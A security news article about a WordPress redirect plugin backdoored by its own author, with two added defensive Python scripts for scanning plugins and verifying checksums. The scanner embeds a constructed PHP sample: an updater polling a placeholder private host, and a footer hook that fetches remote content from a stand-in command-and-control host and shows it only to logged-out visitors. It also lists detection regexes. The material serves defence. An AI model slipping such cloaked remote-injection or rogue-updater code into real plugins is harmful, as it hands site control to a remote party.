Critical WordPress Plugin Bug Lets Attackers Inject Malicious Code
Key Takeaways
- A critical supply chain vulnerability was discovered in the popular WordPress Quick Page/Post Redirect Plugin, affecting over 70,000 active installations.
- The plugin’s original author intentionally introduced a backdoor five years ago, enabling silent injection of arbitrary malicious code.
- The attack relied on a custom update mechanism bundled with the plugin, so code pushed through it never passed through the WordPress.org update channel; the payload was used for parasite SEO and amounted to remote code execution on affected sites.
- While the command-and-control server is currently offline, the update mechanism remains active, posing a persistent threat.
- Users are urged to verify plugin checksums and uninstall the compromised plugin, replacing it with secure alternatives.
Sophisticated Backdoor Uncovered in Popular WordPress Plugin
A significant supply chain vulnerability has been identified within the Quick Page/Post Redirect Plugin, a widely used WordPress extension boasting more than 70,000 active installations. Security researcher Austin Ginder unearthed a dormant backdoor, surreptitiously introduced half a decade ago, designed to inject arbitrary malicious code into websites without detection.
The plugin shipped its own remote update checker, so anything delivered through it bypassed the WordPress.org update channel and its review. That turned the plugin into a vector for illicit SEO injection and, because an update is installed and executed like any other plugin code, for remote code execution on every site that polled it.
Deep Dive: The Backdoored WordPress Plugin
The investigation began with routine security audits on a hosting infrastructure, which flagged installations reporting plugin version 5.2.3 whose file hashes did not match the official 5.2.3 release on the WordPress repository. The tampered files contained an unauthorized function that contacted a third-party server and injected the content it received directly into the site's pages.
To stay hidden, the injected code suppressed itself for logged-in administrators and activated only for ordinary visitors and search engine crawlers. The compromise had two distinct components.
The active component was a bundled copy of a plugin update checker library, configured to poll a server under the developer's control rather than the legitimate WordPress update infrastructure. An update delivered through that channel is installed and executed like any other plugin code, so whoever controls that server can run arbitrary PHP on every site that polls it. The passive component was the injected payload itself, which covertly fetched and displayed hidden content from a remote command-and-control server. That command-and-control server is currently inactive, so the payload is dormant, but the update mechanism remains fully operational and could be used to push a new payload at any moment.
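Both traits just described leave static fingerprints in PHP source: an update checker pointed at a host other than WordPress.org, and a remote fetch whose output is gated on whether the viewer is logged in or on the User-Agent. The scanner below is an added example, not code from the article, the researcher, or the plugin. The PHP it scans is constructed here; the entry-point name buildUpdateChecker is an assumption that the bundled updater follows the convention of the widely used plugin-update-checker library; and the trusted-host list and regexes are heuristics to tune, not a signature for this plugin.

```python
"""Heuristic scan of PHP plugin source for (a) an update checker that polls a
non-WordPress.org host and (b) remote content cloaked from logged-in users.
Example code, not from the original article; the sample PHP is constructed."""
import os
import re
from urllib.parse import urlparse

# Hosts a WordPress.org-hosted plugin legitimately talks to for updates.
TRUSTED_UPDATE_HOSTS = {"wordpress.org", "api.wordpress.org", "downloads.wordpress.org"}

URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'\"<>)]*)?")
# Assumption: the bundled updater uses the plugin-update-checker library's
# buildUpdateChecker() entry point; extend this for other updater libraries.
UPDATER_RE = re.compile(r"buildUpdateChecker|PluginUpdateChecker|Plugin_Update_Checker")
REMOTE_FETCH_RE = re.compile(r"wp_remote_get|wp_remote_post|file_get_contents\s*\(\s*['\"]https?:|curl_exec")
CLOAK_RE = re.compile(r"is_user_logged_in\s*\(|HTTP_USER_AGENT")


def scan_php_source(relpath, source):
    """Return (relpath, category, detail) findings for one PHP file's source text."""
    findings = []
    if UPDATER_RE.search(source):
        # An updater is present: every non-WordPress.org URL in this file is a lead.
        for url in URL_RE.findall(source):
            host = urlparse(url).hostname or ""
            if host and host not in TRUSTED_UPDATE_HOSTS:
                findings.append((relpath, "custom-update-endpoint", url))
    if CLOAK_RE.search(source) and REMOTE_FETCH_RE.search(source):
        findings.append((relpath, "cloaked-remote-content",
                         "remote fetch in a file that branches on login state or User-Agent"))
    return findings


def scan_plugin_dir(plugin_dir):
    """Walk a real plugin directory and scan every .php file."""
    findings = []
    for root, _dirs, files in os.walk(plugin_dir):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                source = fh.read()
            findings.extend(scan_php_source(os.path.relpath(path, plugin_dir), source))
    return findings


# Constructed sample plugin: a benign main file, an updater pointed at a
# private host, and a footer hook that fetches remote content only for
# visitors who are not logged in. Hostnames use the reserved .invalid TLD.
SAMPLE_PLUGIN = {
    "redirect.php": "<?php\n/*\nPlugin Name: Example Redirect\nVersion: 5.2.3\n*/\n"
                    "add_action('init', 'example_redirect_init');\n",
    "vendor/updater.php": "<?php\nrequire 'plugin-update-checker.php';\n"
                          "$checker = Puc_v4_Factory::buildUpdateChecker(\n"
                          "    'https://updates.example.invalid/redirect/metadata.json', __FILE__, 'example-redirect');\n",
    "inc/footer.php": "<?php\nfunction example_footer() {\n"
                      "    if (is_user_logged_in()) { return; }\n"
                      "    $r = wp_remote_get('https://c2.example.invalid/content');\n"
                      "    echo wp_remote_retrieve_body($r);\n}\n"
                      "add_action('wp_footer', 'example_footer');\n",
}


def demo_findings():
    """Scan the constructed sample in memory; returns the list of findings."""
    findings = []
    for rel, src in SAMPLE_PLUGIN.items():
        findings.extend(scan_php_source(rel, src))
    return findings


if __name__ == "__main__":
    for rel, category, detail in demo_findings():
        print(f"{category:24} {rel}: {detail}")
```

Findings are leads, not verdicts: commercial plugins legitimately update from their vendor's host, and a license check may also branch on login state. What made this case malicious was a WordPress.org-hosted plugin polling a private server while its official source showed no updater at all, which is why the checksum comparison below, not this scan, is the authoritative test.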
An Inside Job: Supply Chain Attack Orchestrated by Author
Analysis of the plugin's commit history showed that the attack was orchestrated by the plugin's original author, identified as anadnet. The developer committed the malicious self-updater to the official repository in late 2020, from where it propagated to thousands of websites. Months later, the author distributed the tampered payload through their private server and then quietly removed the custom updater from the official source code. That removal erased the obvious traces from the official repository, but every site that had already installed the updater kept polling the author's infrastructure, and does so until the plugin is removed.
In April 2026, the WordPress plugin review team temporarily removed the Quick Page/Post Redirect Plugin from its directory pending investigation. Conventional vulnerability scanners miss this kind of compromise because they key on the version string in the plugin header: the tampered files still report 5.2.3, so a scanner that only compares version numbers treats the installation as current and unmodified.
According to a report by Austin Ginder at Anchor, administrators should use WP-CLI (wp plugin verify-checksums), which compares each installed plugin file against the checksums WordPress.org publishes for that version. A mismatch means the file on disk is not what WordPress.org shipped for that version and should be treated as suspect until explained; a matching version number on its own proves nothing. Security experts advise completely uninstalling any affected plugin and migrating to actively maintained, secure alternatives.
What You Should Do
- Verify Plugin Checksums: Use the WordPress command-line interface (WP-CLI) to compare your installed plugins against the official WordPress repository (wp plugin verify-checksums --all). Mismatched, missing, or unexpected extra files indicate a file set that differs from the official release and warrant investigation.
- Uninstall Immediately: If the Quick Page/Post Redirect Plugin is installed on your WordPress site, uninstall it completely. Deactivating it is insufficient: the tampered files and their bundled update checker remain on disk, and reactivating the plugin re-arms the malicious update channel.
- Choose Alternatives: Replace the compromised plugin with actively maintained and reputable redirect plugins from trusted sources.
- Review Logs: Review your website and server logs for suspicious activity, including recently modified plugin files, outbound requests to hosts you do not recognize, and pages whose content differs between a logged-out visitor or crawler and a logged-in administrator.
- Update Regularly: Ensure all other plugins, themes, and your WordPress core are kept up-to-date to mitigate other known vulnerabilities.
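The checksum step above is what WP-CLI's wp plugin verify-checksums does against the manifest WordPress.org publishes at https://downloads.wordpress.org/plugin-checksums/<slug>/<version>.json. The script below is an added example, not the article's or WP-CLI's code: it reproduces that comparison against a constructed manifest and a constructed plugin tree so it runs offline, and it also reads the plugin header's Version line to show that the header can agree with the manifest while the files do not. The plugin name, file contents, and the injected file are all constructed.

```python
"""Verify a plugin directory against a WordPress.org-style checksum manifest.
Example code, not from the article or from WP-CLI. The manifest mirrors the
shape of the plugin-checksums JSON ("files": {relative path: {"sha256": ...}});
the plugin files and the tampering are constructed so the script runs offline."""
import hashlib
import os
import re
import tempfile

# WordPress reads plugin headers from the first 8 KiB of the main file.
VERSION_RE = re.compile(r"^[ \t/*#@]*Version:[ \t]*(\S+)", re.MULTILINE)


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def plugin_header_version(main_file):
    """Return the Version: value from the plugin header comment, or None."""
    with open(main_file, encoding="utf-8", errors="replace") as fh:
        head = fh.read(8192)
    m = VERSION_RE.search(head)
    return m.group(1) if m else None


def verify_plugin(plugin_dir, manifest):
    """Compare every file on disk with manifest['files'].
    Returns {'modified': [...], 'missing': [...], 'unexpected': [...]}; all
    three lists empty means the tree is byte-for-byte the official release."""
    expected = manifest["files"]
    on_disk = {}
    for root, _dirs, files in os.walk(plugin_dir):
        for name in files:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, plugin_dir).replace(os.sep, "/")
            on_disk[rel] = sha256_of(path)
    return {
        "modified": sorted(p for p in expected if p in on_disk and on_disk[p] != expected[p]["sha256"]),
        "missing": sorted(p for p in expected if p not in on_disk),
        # Files absent from the manifest are the classic sign of an injected loader.
        "unexpected": sorted(p for p in on_disk if p not in expected),
    }


# Constructed "official" 5.2.3 release and the manifest derived from it.
OFFICIAL = {
    "quick-redirect.php": "<?php\n/*\nPlugin Name: Example Redirect\nVersion: 5.2.3\n*/\n",
    "readme.txt": "=== Example Redirect ===\nStable tag: 5.2.3\n",
}
MANIFEST = {
    "plugin": "example-redirect",
    "version": "5.2.3",
    "files": {p: {"sha256": hashlib.sha256(c.encode()).hexdigest()} for p, c in OFFICIAL.items()},
}

# Constructed tampered install: same Version header, an appended require,
# an extra file the release never had, and a dropped readme.
TAMPERED = dict(OFFICIAL)
TAMPERED["quick-redirect.php"] += "require __DIR__ . '/inc/loader.php';\n"
TAMPERED["inc/loader.php"] = "<?php\n// constructed stand-in for an injected file\n"
del TAMPERED["readme.txt"]


def write_tree(files):
    """Write a {relative path: content} dict into a fresh temp directory."""
    base = tempfile.mkdtemp()
    for rel, content in files.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content.encode("utf-8"))
    return base


def demo():
    """Verify the tampered tree; the header still says 5.2.3 but the files do not match."""
    base = write_tree(TAMPERED)
    report = verify_plugin(base, MANIFEST)
    report["header_version"] = plugin_header_version(os.path.join(base, "quick-redirect.php"))
    return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:15} {value}")
```

Two caveats apply to the real command as well: WordPress.org only publishes checksums for plugins it hosts, so a plugin installed from elsewhere has no manifest to verify against, and a mismatch on a file you edited locally is expected. Treat anything else, above all an unexpected extra file, as a compromise until you have read the file.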
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.